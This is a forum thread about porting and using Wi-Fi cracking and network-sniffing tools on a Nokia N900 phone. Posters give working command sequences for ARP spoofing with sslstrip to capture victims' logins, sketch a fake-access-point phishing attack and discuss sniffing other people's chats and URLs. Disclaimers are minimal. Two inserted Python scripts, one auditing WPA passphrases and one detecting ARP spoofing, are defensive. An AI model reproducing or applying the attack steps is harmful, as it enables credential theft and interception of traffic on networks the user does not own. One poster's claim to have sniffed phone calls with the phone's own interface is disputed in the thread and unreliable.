echo "java -jar /opt/grimwepa/grimwepa-n900.jar" >> grimwepa
mv grimwepa /usr/bin
chmod +rwx /usr/bin/grimwepa
cd ..
rmdir binaries
--------------------------------------
NOTE: grimwepa in icedtea6 maemo version may crash from time to time so when you launch grimwepa you can hack only 1 wifi
relaunch it to hack another one (if you want stable then install easy-debian)
But you need to do this inside easy-chroot
---------------------------------------------------------------------------
apt-get install openjdk-6-jre-headless openjdk-6-jre openjdk-6-jre-lib openjdk-6-jre-zero openjdk-6-jre-headless xterm aircrack-ng
----------------------------------------------------------------------------
NOTE : if you are using enhanced busybox then do :
---------------------------------
apt-get install procps #ONLY IF YOU ARE HAVING THAT BUSYBOX!!!!!!!!!
Simply copy and paste the codes i provided but make sure you write root or sudo gainroot :) before pasting
---------------------------------
part5 : some very useful TMO links
1-)This one is an automated MITM attack script (all details are in its thread) Thanks to Unhuman for alerting us to it and vi_ for modifying it and all others involved
http://talk.maemo.org/showpost.php?p=1030933&postcount=1
PS if you followed my instructions you should have all the dependencies of it
2-)This one is an automated WEP hacking script (all details are in its thread) Thanks to vi_, torpedo48 and all others involved
http://talk.maemo.org/showpost.php?p=1030935&postcount=2
Now we are Done here after doing everything correctly you should have a nice hacking small device
For usage of these tools use google
ONLY FOR Pentesting DoN't HaRm PeOpLe ;)
You are so greatful !!!
It runs quite smoothly in interface wlan0, but when I try gprs0, it crashes
Nokia-N900:~# ettercap -G
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
ERROR : 9, Bad file descriptor
[ec_send.c:send_init:118]
libnet_init(LIBNET_LINK_ADV) failed: unknown physical layer type 0x335
does it work with WPA\WPA2 ?
torpedo48
2011-07-03, 16:19
Nice guide , I would like to see a video of you using these hacks . :)
Attack with YAMAS:
http://www.youtube.com/watch?v=9bSq7tXSGAo
Cracking WEP with Wifite:
http://www.youtube.com/watch?v=D3-Pobgi8JM
Cracking WEP with Aircrack-ng suite:
http://www.youtube.com/watch?v=WEVZ463xilU
@pursueky
of course it will crash if used gprs0 because you can't spoof the whole country as there is no local ip
@Del
yes it does
@torpedo48
thanks for the videos
@Del
yes it does
brother
so , why it didn't work with me ? :confused:
Hmm if you was trying to hack WPA you have to do it with a dictionary attack
but
this attack is known as useless
and it takes too much time specially on n900 (600mhz)
there is another way
but it is complicated
and i can't post it here
illegal blablaba.....
stevomanu
2011-07-05, 00:11
Hmm if you was trying to hack WPA you have to do it with a dictionary attack
but
this attack is known as useless
and it takes too much time specially on n900 (600mhz)
there is another way
but it is complicated
and i can't post it here
illegal blablaba.....
can you inbox it or email would be good to hear ..
Is it possible to actually use rainbow tables with nokia n900 ?
Hmm if you was trying to hack WPA you have to do it with a dictionary attack
but
this attack is known as useless
and it takes too much time specially on n900 (600mhz)
there is another way
but it is complicated
and i can't post it here
illegal blablaba.....
:D
can you
e-mail it to me , plz
casper27
2011-07-05, 16:55
:D
can you
e-mail it to me , plz
Try googling Amazon server wpa see what turns up :D
pursueky
2011-07-05, 17:10
Hmm if you was trying to hack WPA you have to do it with a dictionary attack
but
this attack is known as useless
and it takes too much time specially on n900 (600mhz)
there is another way
but it is complicated
and i can't post it here
illegal blablaba.....
Amazon server wpa?,
Can someone help me with this:
-------
tar xzvf karam.tar.gz
-------
I get this message:
tar: can't open 'karam.tar.gz': No such file or directory
Don't know in which directory to put this file :-/ .... tried the main folder and some other folders but doesn't seems to work ...
casper27
2011-07-05, 19:43
Can someone help me with this:
-------
tar xzvf karam.tar.gz
-------
I get this message:
tar: can't open 'karam.tar.gz': No such file or directory
Don't know in which directory to put this file :-/ .... tried the main folder and some other folders but doesn't seems to work ...
It depends where you downloaded the file to, default is
/home/user/MyDocs
You can see whats in each dir by using the command
ls
If you have just opened xterm you are in
/home/user
So to get to MyDocs folder
cd MyDocs
Then
ls
To see if it's in there.
Then untar with
tar -xzvf karam.tar.gz
tar xzvf karam.tar.gz
Actually, it is tar -xzvf karam.tar.gz ;).
casper27
2011-07-05, 19:52
Actually, it is tar -xzvf karam.tar.gz ;).
Corrected typo thanks
ok thanks guys i have corrected the typo
i will organize the thread a bit when i post metasploit and SET guides
@r4ste
yes it is possible
and for people who are asking the wpa hack way
it is not public sorry :(
but there is a way with making a fake ap with the same bssid and essid of the targeted network
and prepare a phisher
then continue with dnsspoof and dhcp and apache2
It depends where you downloaded the file to, default is
/home/user/MyDocs
You can see whats in each dir by using the command
ls
If you have just opened xterm you are in
/home/user
So to get to MyDocs folder
cd MyDocs
Then
ls
To see if it's in there.
Then untar with
tar -xzvf karam.tar.gz
I don't know where to put the file. I downloaded it on my laptop and connected my n900 with mass storage mode to my laptop. Then i went to My Computer -> Nokia N900(G: ) and just paste the file there.
I also tried almost every folder. This is so crazy
Just to calm down some "FUD apocalypse" starting here slowly...
[wifi-hacking-theory-blabla]
...WPA decrypting via amazon cloud servers isn't anything special nor new. Roth just used dictionary-then-bruteforce attack on relatively short (6 characters, without special, punctuation, etc) password and WPA (not WPA2, important!). He claims, that his modification of dict-bruteforce is 2.5x faster than old methods - this may be one of many small steps forward, but still, decrypting real password with regular length and numbers/uppercase/lowercase/special combo would take ages. Literally. Not to mention WPA2 ;)
Still, there IS way to crack WPA/WPA2 passwords with silly SSID's and relatively long passwords (although not very long and complicated) - using so-called Rainbow Tables (if You don't know what it is, Wikipedia is Your friend). Success depends also on table quality, so it's mainly good for VERY thoroughly prepared attacks. You can even create own tables for custom SSID, but that would take long time of big cloud server to create. Although, You can even use it with N900 - if You take few terabyte-sized HDs with You and connect them via HEN :) Still, mhz and bus speed (limited USB speed) matters, cause device must go through partially creating (tens/hundreds) MILLIONS of passwords, using half-created hashes from database.
Also, many people just use WPA/WPA2 password as delivered with their router from manufacturer, and in many (if not all) cases this password IS somehow related to router's serial number, and "random" SSID is sometimes also delivered from SN. For routers with such algorithm already revealed and NOT fixed/changed by manufacturer in next revision, getting key is easy as pie and can be calculated in <second. It's really nasty thing, cause it gives false aura of security. For router's owner, mostly ;)
[/wifi-hacking-theory-blablabla]
... Anyway, guy with "phone" connected to terabyte HD via cable with USB adapter, doesn't look more suspicious than guy with a laptop. No, really. This happens all the time ;)
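For anyone checking their own access point against the points in the post above, here is an added example (not code from the thread): WPA/WPA2-PSK derives its key with PBKDF2-HMAC-SHA1 using the SSID as salt, which is why precomputed tables only cover common network names, and the size of the search space depends on passphrase length and character classes. The SSID list, sample names and guess rate are constructed assumptions.

```python
import hashlib
import math
import string

# Constructed sample of factory-default style network names. Precomputed
# tables are only useful against SSIDs somebody bothered to precompute.
COMMON_SSIDS = {"linksys", "default", "NETGEAR", "dlink"}

SECONDS_PER_YEAR = 365 * 24 * 3600


def wpa_pmk(passphrase, ssid):
    """WPA/WPA2-PSK key derivation: PBKDF2-HMAC-SHA1, SSID as salt,
    4096 iterations, 32-byte output."""
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode(), ssid.encode(), 4096, 32
    )


def charset_size(passphrase):
    """Size of the smallest class-based alphabet containing the passphrase."""
    size = 0
    if any(c in string.ascii_lowercase for c in passphrase):
        size += 26
    if any(c in string.ascii_uppercase for c in passphrase):
        size += 26
    if any(c in string.digits for c in passphrase):
        size += 10
    if any(not c.isalnum() for c in passphrase):
        size += 33  # printable ASCII symbols, space included
    return size


def audit(ssid, passphrase, guesses_per_second):
    """Summarise how exposed an SSID/passphrase pair is.

    guesses_per_second is an assumption supplied by the caller; the result
    is the time to try every candidate of this length and alphabet.
    """
    space = charset_size(passphrase) ** len(passphrase)
    return {
        "ssid_precomputable": ssid in COMMON_SSIDS,
        "keyspace_bits": round(math.log2(space), 1),
        "years_to_exhaust": space / guesses_per_second / SECONDS_PER_YEAR,
    }


if __name__ == "__main__":
    # Same passphrase, two SSIDs: the derived keys share nothing, so a table
    # built for one network name says nothing about the other.
    print(wpa_pmk("abcdef", "linksys").hex())
    print(wpa_pmk("abcdef", "HomeNet-7f3a").hex())

    # Constructed inputs: default SSID with a short lowercase passphrase,
    # then a unique SSID with a long mixed passphrase. Rate is an assumption.
    print(audit("linksys", "abcdef", 100_000))
    print(audit("HomeNet-7f3a", "c0rrect-Horse-battery-9", 100_000))
```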
stevomanu
2011-07-05, 21:11
@r4ste
yes it is possible
and for people who are asking the wpa hack way
it is not public sorry :(
but there is a way with making a fake ap with the same bssid and essid of the targeted network
and prepare a phisher
then continue with dnsspoof and dhcp and apache2
As far as i know inboxs are PRIVATE but if you cant thats a big shame , also when are we looking at these tutorials ..
As far as i know inboxs are PRIVATE but if you cant thats a big shame , also when are we looking at these tutorials ..
But what do You want, citation You quoted tells everything. Anyway, I think that information for educational purposes isn't illegal, but funniest thing is that he DID an almost newbie-proof tutorial for phishing based attack, few pages ago ;)
Still, don't try that at home (or outside). Phishing anyone by false web page (even false router prompt) isn't running wifite to crack WEP. If, by any chance, attacked person gets more experienced assistance (has pro cousin, son, uncle or whatever) - or just isn't an idiot @ the moment of attack, You can get into real trouble very soon. Including meeting with some blue girls and guys. In both meanings of "blue" ;)
Without additional preparations, You leave dozens of traces there, that can be retrieved even months (@ some cases) after attack from victim computer. You've been warned.
Estel is correct
but in my country syria
they don't know what is wireless
they just use it :p
so in my place all the networks besides me are ***** including wpa/wpa2 ones
Hydra attack on router
tools
nmap
hydra
result:
anybody can HELP me ???????????????????????
:eek:
stevomanu
2011-07-17, 09:38
anybody can HELP me ???????????????????????
:eek:
maybe if people knows whats wrong we could decide ?
JamesBond@ge
2011-07-17, 10:04
anybody can HELP me ???????????????????????
:eek:
maybe if people knows whats wrong we could decide ?
LOL innit.
What a dunce.
is there any possibility to make a hydra gui for n900?
Mohammad
2011-07-25, 14:37
i think there is a gui somewhere
i have found one many weeks ago but forgot what was its name
but you can search for it
stevomanu
2011-07-25, 15:41
one question anybody know how we can download the mega upload file when it doesnt work with our browsers ??
use TOR (The Onion router)
search it with google
and use it to download the file from megaupload
it's just like a proxy server
stevomanu
2011-07-25, 16:31
use TOR (The Onion router)
search it with google
and use it to download the file from megaupload
it's just like a proxy server
this is issue im having , which seems like a flash issue but i could be wrong ?
http://dl.dropbox.com/u/10188212/screenshots/Screenshot-20110725-173137.png
problem solved it was my adblock.css uninstalled that an all good .. ..
megaupload has nothing to do with flash thing
it must be an ip thing
if you are in a country just like mine
several people use the same ip
and megaupload has a limited download availability
so megaupload thinks that you have already downloaded while actually an other person downloaded
not you
so TOR gives you another ip address which will allow you to download easily
stevomanu
2011-07-27, 14:53
megaupload has nothing to do with flash thing
it must be an ip thing
if you are in a country just like mine
several people use the same ip
and megaupload has a limited download availability
so megaupload thinks that you have already downloaded while actually an other person downloaded
not you
so TOR gives you another ip address which will allow you to download easily
no matter what connection i use the download link never pops up so cant see it being IP problem my self i use my pc on megaupload all the time ...
thanks again
JamesBond@ge
2011-07-27, 16:19
That's weird. Megaupload works fine for me and I'm in the UK. Rapidshare can be tricky to get working but that works eventually.
stevomanu
2011-07-27, 16:27
im just wondering if it has something to do with adflashblock-css which i have installed , well that's all i can think of anyways ....
will uninstall it an report back
Seker_94
2011-07-28, 20:38
i don't have any issues downloading that file
JamesBond@ge
2011-07-28, 21:20
im just wondering if it has something to do with adflashblock-css which i have installed , well that's all i can think of anyways ....
will uninstall it an report back
That might be the problem as I've never had that installed on my phone.
lost_bro
2011-07-30, 23:27
I ported THC-Hydra (http://www.thc.org/thc-hydra/). If somebody needs it, just install the deb from the attachment ;)
Hello all:
Finally got around to installing Thc Hydra on my N900.
The command line seems to work fine.
When I 'xhydra' I do get the GUI and it will crack my router when I give it the Login and Password.
The problem is:
When I go to open the password list, the GUI crashes and the program closes. I cannot give the 'path' to the word file as the gui disappears/crashes instantaneously.
I get the 'Dreaded' Segmentation Fault ERROR in xterm.
This is a great program, help me if you know how to fix this.
What Have I done wrong?
Thanks to all.
Lost_bro
hmm haven't tried xhydra yet (the gui)
however you can tell me what the output tells you when the program crashes
i think i might be able to help
lost_bro
2011-08-05, 04:02
Hello Karam
hmm haven't tried xhydra yet (the gui)
however you can tell me what the output tells you when the program crashes
i think i might be able to help
OK, as you know, when you 'xhydra' in xterm, the GUI will open an new window.
The original xterm stays open after the GUI is closed/crashes.
This is the result of trying to input the 'path' to wordlist:
The xhydra GUI crashes and this is the output on xterm.
Let me know if I can offer you any more info regarding the crash.
Take care
Lost_bro
Finally , Neopwn is here in the name of pwnphone
http://www.pwnieexpress.com/pwn_phone.html
Finally , Neopwn is here in the name of pwnphone
http://www.pwnieexpress.com/pwn_phone.html
Fail. Now, go away.
n900shamie
2011-08-11, 08:18
Finally , Neopwn is here in the name of pwnphone
http://www.pwnieexpress.com/pwn_phone.html
hiii, have u got any installation guide for that:::...
hiii, have u got any installation guide for that:::...
Download the Pwn Phone Image and the installation guide is contained within the rar file,
...while still no sane one care for that sh*t, when we got ED, fAircrack, Cleven, etc. So, be gone (neopwn, not You).
eddieselamp
2011-08-17, 21:42
cant open link...any link than this one..?
downloading and will upload at another link
this will take a while
i have 256 kb net
upload 10kb/s
EDIT : Uploaded To multiupload
link on 1st post
http://www.backtrack-linux.org/wiki/index.php/DECT_Sniffing_Dedected#Record_the_phone_call
any chance for this program to run on n900. or is there another program to be used with n900.
http://www.backtrack-linux.org/wiki/index.php/DECT_Sniffing_Dedected#Record_the_phone_call
any chance for this program to run on n900. or is there another program to be used with n900.
You'd need an original Dosch&Amand Type II PCMCIA Card and an adapter for that to be useful
Adapter from PCMCIA to USB, or what?
guys that operation is dangerous for N900
it is possible and worked with me but it ended ruining my phone0 interface on N900
so i have replaced it with a new one
you can try if you want but it's on your own risk
PS: i didn't use any external chips/adapters
What procedure? It's physically impossible to sniff DECT via sole N900, lol. No matter how hard You try ;) It's just different standard of communication.
It's just like trying to connect to cable ethernet via N900 WiFi card. You can try and "ruin" as many interfaces as You want but it just won't happen.
Unless I've misunderstood something here, You're pulling our legs ;)
no no you didn't get it
i meant i tried sniffing phone calls using the interface phone0 with wireshark and some other tools
that ended in an overload for that interface ----> destroying it
it is possible and worked with me
So, basically, except for messing up Your system, it *wasn't* "working with You". Obviously, cause it's physically impossible to sniff DECT calls via N900. Are we talking about same thing?
So, basically, except for messing up Your system, it *wasn't* "working with You". Obviously, cause it's physically impossible to sniff DECT calls via N900. Are we talking about same thing?
well i meant sniffing phone calls in general NOT only DECT calls
haven't tried DECT calls
so probably we are not talking about the same thing
So, still I don't get what have worked for You. Cause, obviously, not sniffin *any* calls. The only thing You theoretically *can* try sniffing via phonet is mobile one. Next to impossible, and even if somehow someone succeed, all she/he can get is encrypted data output with no way to decrypt it.
EDIT : removed due illegal instructions -_-
Hm, interesting. I'll investigate it further. Thanks for explaining.
hmm ok Estel i will explain what i did :
then i searched for the networks (GSM) from N900
then chose the default one that my SIM uses
tried to scan for other GSM receiver
i found 9999999 of numbers
chose number 555 (that was exactly the number i chose)
wireshark started to show me data getting sniffed
after it finished i opened the cap file with multiple decrypters
i could find the number from who to who
also the area both numbers are in
but wasn't able to change the cap into wav(or any sound format)
can you upload the cap file, so we can see what it contains?
my question was for cordless phones from home not for mobiles phones. can we sniff with n900? if yes how ?
Read few last posts, and You'll know the answer.
@mooglez
i'm sorry but that was a loooong time ago
i have reformated my PC and reflashed my N900 many times
i don't think it still exists
stevomanu
2011-10-06, 23:08
was wondering if you plan on getting around to them tutorials you mentioned ...
3-)SET social engineering toolkit
Hmm well this is currently not needed if you don't have metasploit3
i will post a tutorial for it later also for metasploit3 and its full functions
trying to find a good install tutorial for SET you see ...
well currently i don't have time nor N900 to write these tutorial
i wish someone do it instead of me
but when i have the time i may write it
PS also armitage is working perfectly on N900
stevomanu
2011-10-07, 11:45
well currently i don't have time nor N900 to write these tutorial
i wish someone do it instead of me
but when i have the time i may write it
PS also armitage is working perfectly on N900
that's a shame , not heard of armitage to be honest but will look into it ..
tonypower88
2012-01-07, 18:54
karam please upload charon the mdk3 gui application
sure but just wait a bit more
till i package it and gather its depends ;)
If You like so much to create packs of applications, why not to start uploading them to repos? I would pass through Q&A, possibly hammering headache-resulting bugs.
/Estel
i have just finished it
it has mdk3 fully working
with the destruction mode
inshort it can do the ultimate wifi damage attack
but please test it only on your own network
anyone can test it ?
please send a PM
after confirmation .. i will upload it to devel
mr_pingu
2012-01-11, 06:10
I can, but don't know how soon as I am having exams next week... I can probably do only little testing. I think estel can give you the feedback you need ;)
after confirmation .. i will upload it to devel
Nice, because that is what I've requested ;) This way, code is openly available, and tools You've ported are suspect of Q&A - it's nice for hammering possible bugs.
Also, it's great chance for disappearance of general (or mainstream, if You like to call it that way) suspicious stance for Your work - uploading to repos and git or garage, everything should be well documented, and controversial things solved easily.
/Estel
to Unhuman
arpspoof testing working version
stevomanu
2012-01-24, 17:08
Do you know how to fix this
home/opt # ./arpspoof
./arpspoof: error while loading shared libraries: libnet.so.0: cannot open shared object file: No such file or directory
/home/opt #
to Unhuman
arpspoof testing working version
that's what i was actually wanted Unhuman to test ;) (in pm messages)
looks like you did it before him
ok then i will upload requests of it one by one
sudo gainroot
tar xzvf MyDocs/libnet.tar.gz
mv libnet.so.0 /usr/lib
it will ask for another lib
just tell me the name of it
stevomanu
2012-01-24, 17:49
All works fine just need to test it now ....
Version: 2.4
Usage: arpspoof [-i interface] [-t target] host
/home/opt #
i had to use this command to extract it .....
tar xzvf /home/user/MyDocs/libnet.tar.gz
that's what i was actually wanted Unhuman to test ;) (in pm messages)
looks like you did it before him
ok then i will upload requests of it one by one
sudo gainroot
tar xzvf MyDocs/libnet.tar.gz
mv libnet.so.0 /usr/lib
it will ask for another lib
just tell me the name of it
i tried using aircrack and it worked .. so i am asking what is the difference between this and aircrack ?
thanks in advance :)
don't forget to :
sudo gainroot
echo "1" > /proc/sys/net/ipv4/ip_forward
or else everything is useless
@davdav
this is completely something different from aircrack
it's MITM same as ettercap but ultra faster
stevomanu
2012-01-24, 17:52
A quick test and all seems ok with the build .....
/arpspoof -i wlan0 -t 192.168.1.3 192.168.1.5
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
^O2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2
cheers
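Seen from the other side of the network, the stream of identical unsolicited replies in the output above is what an ARP monitor keys on. The following is an added example, not code from the thread: it parses lines in the format shown in that post and flags bindings that contradict a known-good table, one MAC claiming several IPs, and heavily repeated replies. The baseline table, the second host's MAC and the repeat threshold are constructed assumptions.

```python
import re
from collections import Counter, defaultdict

# One MAC address; the tool prints octets without zero padding (0c -> c).
MAC = r"(?:[0-9a-f]{1,2}:){5}[0-9a-f]{1,2}"

# Line format as printed in the post above:
#   <sender mac> <dest mac> 0806 42: arp reply <ip> is-at <mac>
ARP_REPLY = re.compile(
    rf"(?P<src>{MAC})\s+(?P<dst>{MAC})\s+0806\s+\d+:\s+"
    rf"arp reply (?P<ip>\d{{1,3}}(?:\.\d{{1,3}}){{3}}) is-at (?P<mac>{MAC})",
    re.IGNORECASE,
)


def norm_mac(mac):
    """Lower-case and zero-pad each octet so both spellings compare equal."""
    return ":".join(octet.zfill(2) for octet in mac.lower().split(":"))


def parse_reply(line):
    """Return (claimed_ip, claimed_mac, dest_mac), or None if not an ARP reply."""
    m = ARP_REPLY.search(line)  # search() tolerates terminal junk such as '^O'
    if not m:
        return None
    return m["ip"], norm_mac(m["mac"]), norm_mac(m["dst"])


def detect(lines, baseline, repeat_threshold=5):
    """Return findings for bindings that contradict the baseline, replies
    repeated repeat_threshold times or more, and MACs claiming several IPs."""
    repeats = Counter()
    ips_by_mac = defaultdict(set)
    for line in lines:
        parsed = parse_reply(line)
        if parsed is None:
            continue
        ip, mac, dst = parsed
        repeats[(ip, mac, dst)] += 1
        ips_by_mac[mac].add(ip)

    findings = []
    for (ip, mac, _dst), count in sorted(repeats.items()):
        known = baseline.get(ip)
        if known is not None and norm_mac(known) != mac:
            findings.append(("binding-conflict", ip, mac, count))
        if count >= repeat_threshold:
            findings.append(("repeated-reply", ip, mac, count))
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > 1:
            findings.append(("mac-claims-many-ips", mac, tuple(sorted(ips))))
    return findings


# Sample input: the first line is the format from the post, repeated; the
# remaining lines are constructed for this example.
SAMPLE = [
    "2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: "
    "arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2",
] * 5 + [
    "^O2c:d2:e7:c:61:a2 28:37:37:cc:82:22 0806 42: "
    "arp reply 192.168.1.5 is-at 2c:d2:e7:c:61:a2",
    "2c:d2:e7:c:61:a2 0:1e:aa:bb:cc:1 0806 42: "
    "arp reply 192.168.1.3 is-at 2c:d2:e7:c:61:a2",
    "not an arp line",
]

# Constructed known-good IP -> MAC table (for example from DHCP leases).
BASELINE = {
    "192.168.1.5": "00:1e:aa:bb:cc:01",
    "192.168.1.3": "28:37:37:cc:82:22",
}

if __name__ == "__main__":
    for finding in detect(SAMPLE, BASELINE):
        print(finding)
```

Static ARP entries for the gateway or dynamic ARP inspection on the switch remove the condition this detects.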
cool
now i will go for charon and destruction mode
ULTRA DANGEROUS
but i will work on it tomorrow ;)
arpspoof should be soon the new depend of yamas script :)
stevomanu
2012-01-24, 18:27
Its the same as ettercap but much better and faster
heres a link have a read see what you think ...
http://en.wikipedia.org/wiki/ARP_spoofing
Another good page (http://su2.info/doc/arpspoof.php)
I try arpspoof and is starting.
Thank you
karam and stevomanu
qwertqwert
2012-01-25, 12:04
https://github.com/pwnieexpress/Source-Repository
trisha02
2012-01-25, 14:18
@ karam-- i did apt-get install yamas. then run the icon from the menu. then did as it said in the youtube video of yamas. then i could do it. passwords and login information and website also appeared. can you post a video of each of your hacking tutorials. arp spoofing coz its very hard for a noob to understand what you guys tok abt and also the wiki since i dnt hav any knowledge about linux. but i would love to test al this hacking materials. so please can you give a tutorial with a video or anythng. just for us (noobs). it would be helpful. i kno you are very busy with all your works. so i gues if u could appoint and of the gurus from the thread to just post tutorials. please karam.
omg omg omg omg
i'm so shy from u guys
can some one upload karam.tar.gz to some where ??
i can't download it from mega nor any site uploaded to !!
i need it for packaging libs from it to run arpspoof in repos !
stevomanu
2012-01-26, 17:24
http://dl.dropbox.com/u/44965378/N900%20mods/karam.zip
sorry for the wait ... add link to first page if you like ..
omg omg omg omg
i'm so shy from u guys
can some one upload karam.tar.gz to some where ??
i can't download it from mega nor any site uploaded to !!
i need it for packaging libs from it to run arpspoof in repos !
TO KARAM:
i have talked with other people who have the N900, and MITM attacks are no longer working on the N900: when you run ettercap or any other program that needs promiscuous mode, the connection gets stuck and you can't sniff any packet or navigate with the N900. I have tried to reflash and nothing works. I use:
kernel power 49 with CSSU testing
but i have tried with kernel power 46, 47, 48 and nothing; there is some packet or dependency or something that has screwed up the whole promiscuous mode in the N900.
Do you have the same problem??
- Good news!! Recently the project ettercap has been reborn after 8 years of no actualization with a new version, ettercap 0.74 lazarus; it is a shame we don't have this newer version compiled for the N900, i have tried the new version on my desktop pc and it runs great.
- I have a question for you, are you developing for the N9 ?? because we still don't have any pentesting material on the N9, no ettercap, no wireshark, no nmap, no arpspoof, no aircrack, no metasploit, nothing. It will be great to have someone of your expertise and knowledge developing for N9, because with 1 GB of RAM it will be the perfect pentesting mobile machine.
Karam thanks for the great work, you are for sure one of the biggest experts in the community.
it's actually true that ettercap makes the connection horrible when using it on N900
that's why i have just finished uploading arpspoof (as package name dsniff)
which is already confirmed to not slowing down the connection as ettercap does especially when running heavy sniffs such as sslstrip and YAMAS script (Based on sslstrip)
soon this problem will be solved for N900 as arpspoof will be the dependency of yamas
and for N9
unfortunately i don't have one
so till i get one (maybe will never)
then i will port hacking tools to it
PS: ettercap re alive is awesome
will contact the author of the ettercap package to port it to N900 (it's very easy to do)
i would like to ask you guys to test the new arpspoof
with sslstrip before comax adapts it to YAMAS
sudo gainroot
apt-get install dsniff sslstrip iptables
#press y
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port #pickupanemptyport
arpspoof -i wlan0 -t #target #routerip
sslstrip -l #thesamepickedupnumber
then try to access ex:hotmail from PC
then CTRL+C
then see the sslstrip.log
you should see the pass and the username
Mohammed Muid
2012-01-29, 17:36
@ karam- so arpspoof will just make yamas faster right? karam is it possible to control the hosts? which website they are visiting. redirecting them to something differnt.just for fun.cz i tested it with my pc. it just gives the login info and website. cant do anythng abt it? jst hav to watch it??
and last but not the least- i just love your work man. the speed and battery patches and now this. just proud to be amember of this community. thanks man
yes that's true
and another yes
it's possible
with the same package i uploaded (dsniff)
there is something called dnsspoof
it does the job
but i'll explain later because i don't have enough time now
and i'm honored to be in this community too ;)
PS : dsniff package has those sniffing tools:
arpspoof dnsspoof dsniff filesnarf macof mailsnarf msgsnarf sshmitm sshow tcpkill tcpnice urlsnarf webmitm
ex : msgsnarf will allow you to sniff chat from a victim
and urlsnarf will get you the urls of the victim
and so on
and PS2: i still have many to do like airdrop-ng and hamster ,charon,mdk3,cowpatty ,driftnet
puff many work to do
short time i have
but i will be free after exactly 4 months(long time though) because of my stup*d bakaloriat
sudo gainroot
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 333
arpspoof -i wlan0 -t 192.168.0.2 192.168.0.1
sslstrip -l 333
No luck...
I can not open no pages ( chrome, firefox) no internet ...
ps
try as well 8080 still no luck
Mohammed Muid
2012-01-30, 01:18
yes that's true
and another yes
it's possible
with the same package i uploaded (dsniff)
there is something called dnsspoof
it does the job
but i'll explain later because i don't have enough time now
and i'm honored to be in this community too ;)
PS : dsniff package has those sniffing tools:
arpspoof dnsspoof dsniff filesnarf macof mailsnarf msgsnarf sshmitm sshow tcpkill tcpnice urlsnarf webmitm
ex : msgsnarf will allow you to sniff chat from a victim
and urlsnarf will get you the urls of the victim
and so on
and PS2: i still have many to do like airdrop-ng and hamster ,charon,mdk3,cowpatty ,driftnet
puff many work to do
short time i have
but i will be free after exactly 4 months(long time though) because of my stup*d bakaloriat
ok. that would be just great. so i hav to wait for like 4 months to get a tutorial for dsniff? anyone around who can help me a bit to do all that karam has mentioned? thanks. and best of luck karam
Seker_94
2012-01-30, 12:10
it worked with me
is arpspoof -i wlan0 -t router target ? or only target router?
q6600 maybe your computer is using a proxy
i would like to ask you guys to test the new arpspoof
with sslstrip before comax adapts it to YAMAS
sudo gainroot
apt-get install dsniff sslstrip iptables
#press y
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port #pickupanemptyport
arpspoof -i wlan0 -t #target #routerip
sslstrip -l #thesamepickedupnumber
then try to access ex:hotmail from PC
then CTRL+C
then see the sslstrip.log
you should see the pass and the username
i have tested it with arpspoof and it works perfect!! but it works perfect with sslstrip v0.7!!! with sslstrip v0.9 the connection gets stuck the majority of times.
How is the ettercap 0.74 thing going?? did you already contact the maintainer of the packet?? maybe with the new version of ettercap the connection doesn't get stuck, because although arpspoof does the job well, ettercap with all its plugins and filters gives a more complete MITM experience :D
I would love to know how to compile pentesting programs to be able to port them to N900 and N9. some tutorial, book or guide you recommend me?? i really admire your contribution to this community.
Hi everyone ! Regarding yamas, please post in the appropriate thread so we can easily follow ;)
http://talk.maemo.org/showthread.php?p=1156260&highlight=yamas#post1156260
Btw, the new version with arpspoof is almost out ;) Unhuman could test it this morning.
Oh, and it seems Karam is the one who ported arpspoof to maemo right ? Good job man ;)
@ All
sorry for taking so long to reply
i'm so busy for about 3 months
@-Tyler-
i haven't yet
but i will now
and i think if you try the already compiled binaries the same ones of N900's
it should work unless it has some library required
so simply place the required ones
@comaX
:) already posted at yamas thread about driftnet and dnsspoof and urlsnarf
check it ;)
great news everyone
i have just finished building and uploading the following packages :
mdk3
charon (mdk3 gui)
driftnet
cowpatty
i have also updated dsniff to include dnsspoof.hosts file (was missing from the initial release)
enjoy everyone ;)
left to do : hamster, airdrop-ng
stevomanu
2012-02-13, 16:04
Ah, that's a shame, my nokia is getting fixed i hope , the usb port came out which im very gutted about, back on my n97 for now, how crap is that ...
great work thou as always
icedtea is installed from the repo but i get
Nokia-N900:~# apt-get install -f charon
Reading package lists... Done
Building dependency tree
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:
The following packages have unmet dependencies:
charon: Depends: Icedtea6 but it is not installable
E: Broken packages
Nokia-N900:~#
